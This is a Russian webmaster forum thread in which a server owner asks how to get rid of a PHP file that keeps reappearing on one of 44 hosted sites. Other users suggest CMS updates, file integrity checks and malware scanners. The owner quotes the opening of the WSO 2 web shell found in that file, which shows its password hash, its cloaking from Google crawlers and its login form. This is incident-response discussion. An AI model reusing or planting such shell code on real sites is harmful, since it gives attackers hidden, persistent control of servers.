- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
visavi, ищите дыры в CMS и плагинах/модулях.....
А) обновить все цмс.
Б) убрать плагины с помощью которых могли проникнуть на сервак.
В) проверить все файлы.
Г) лучше всего обратиться к специалисту в этой области.
visavi, ищите дыры в CMS и плагинах/модулях.....
А) обновить все цмс.
Б) убрать плагины с помощью которых могли проникнуть на сервак.
В) проверить все файлы.
Г) лучше всего обратиться к специалисту в этой области.
Пункты Б и В ввели меня в транс ))))) а пункт Г добил )))))
ищи шел. он как правило в находится в категории с картинками или файл типа google2342234 - несколько раз такое видел.
и закрой фтп если еще не закрыл.
Пункты Б и В ввели меня в транс ))))) а пункт Г добил )))))
Нормальные пункты.
Б следует из того, что основной код CMS как правило профессионально написан, а код дополнений скачивается с просторов интернета и вообще ниже качеством в массе.
В подразумевает, что нужно взять файлы из дистрибутива и проверить что они не изменены. Таким образом очень легко найти вставки.
Г следует из того, что вы этих пунктов не поняли.
Нормальные пункты.
Б следует из того, что основной код CMS как правило профессионально написан, а код дополнений скачивается с просторов интернета и вообще ниже качеством в массе.
В подразумевает, что нужно взять файлы из дистрибутива и проверить что они не изменены. Таким образом очень легко найти вставки.
Г следует из того, что вы этих пунктов не поняли.
Вы не меняетесь :D
убрать плагины с помощью которых могли проникнуть на сервак.
Я думаю что если бы я знал через какие плагины ко мне на сервер могут проникнуть , они бы у меня в deny листе были по умолчанию ... Или вы может списочек какой-то опубликовать можете? По этому написанное выше вводит меня в транс :D
В) проверить все файлы.
Тоже ниче так советик :) Из области фантастических фильмов, когда кто-то говорит "Cрочно проверить всю систему!" тут два чувака срываются и через 20 минут все проверено, только это космический корабль :D Специально для ответа придется чуток ждать (я пока продолжу мысль), пока "find / |wc -l" закончит свою работу..... что бы мне "все файлы" посчитало....
Ну а пункт Г, как раз таки и описывает специалиста к которому надо обратиться :D Это ж я не про Вас, а про того кого я цитировал, но вот раз вы за него заступаетесь то это и к вам в огород камушек тогда :D
Вы сравните то, что написали Вы и то что написал Noctes в своих пунктах Б и В, почувствуйте разницу, а лучше спросите у ТС-а, может быть он её почувствовал.
(Блин, еще не посчитало, я склонен полагать что число будет превышать отметку 1mln файлов.....)
Romka_Kharkov, если нет логов что делать будете?
Или вы может списочек какой-то опубликовать можете?
например: http://forum.antichat.ru/showthread.php?t=50572 , - смотрите последние страницы.
Также можно проверить свой сайт на уязвимости с помощью Wordpress P&E - линк
вот вам для примера по WP
ПС: немного про файлы и их проверку:
А) проверить файлы, которые были изменены недавно.
Б) проверить сайты вот этим скриптом - http://revisium.com/ai/ - он покажет файлы, в которых есть шелы(к сожалению не все шелы может найти) + потенциально опасные файлы.(с зашифрованым кодом, вставками ифрейма и т.п.) - это значительно сужает круг поиска.
спасибо за советы. За комп вроде спокоен (удалил установленный нод, поставел касперского интернет секьюрити, запустил полную глубокую проверку всех дисков... в исполнительных вирусов не нашел, было несколько в архиве на диске d (система на c), но это архив - бекап за прошедшую неделю сервера, видимо уже с зараженными, почистил на сервере (посмотрел пути в архиве).
Но эта гадость лезет. На сервере 44 сайта, файл создается только в одном сайте с названием s25.php размером 66094 b и главное я его удаляю, через 2 минуты снова создается. Пароли все сменил, кеш почистил браузеров, убрал галочку запоминания паролей, на сервере полностью закрыл доступ по ftp. не помогает.
Вот часть кода с этого файла:
/**
* WSO 2
* Web Shell by oRb
*/
#$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.2');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>
<center>
<form method=post>
Password: <input type=password name=pass><input type=submit value='>>'>
</form></center>
<?php
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
Ума не приложу где теперь копать
В журнале операций пусто, только мои операции по удалению этого файла, в логах сайта, в логах сервера во время создания этого файла - ничего...
поддержка ответила:
входов по ssh В Мае не было
в ISPmanager все входы в Мае только с этого же ip
Разумеется, содержимое post запросов по умолчанию не логируется, а ответ возможно там. А может и нет, может саму ОС на серваке ломанули.
visavi, а пхп как подключен?
visavi, а пхп как подключен?
Я не силен в администрировании) Это мой первый сервер, не давно его взял.. как посмотреть?